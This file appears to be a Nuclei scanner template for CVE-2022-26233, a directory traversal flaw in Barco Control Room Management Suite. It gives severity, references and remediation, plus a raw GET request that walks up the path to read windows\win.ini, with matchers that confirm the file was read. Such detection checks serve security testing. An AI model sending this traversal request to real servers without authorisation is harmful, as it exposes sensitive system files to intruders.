44 lines
1.7 KiB
YAML
44 lines
1.7 KiB
YAML
id: CVE-2022-26233
|
|
|
|
info:
|
|
name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
|
|
remediation: |
|
|
Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
|
|
reference:
|
|
- https://0day.today/exploit/37579
|
|
- http://seclists.org/fulldisclosure/2022/Apr/0
|
|
- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-26233
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-26233
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00631
|
|
epss-percentile: 0.7673
|
|
cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: barco
|
|
product: control_room_management_suite
|
|
tags: cve,cve2022,barco,lfi,seclists,packetstorm
|
|
|
|
http:
|
|
- raw:
|
|
- |+
|
|
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
unsafe: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
# digest: 490a0046304402205c30f0081233ebcdc42d3e6c6703fdfca8fea7b012fa48c02010f8459dc206a402205791dfc97a53b5df8f80820e8d4f8999d3c1a748fd5e00d9d430189e0c0b4fc2:922c64590222798bb761d5b6d8e72950 |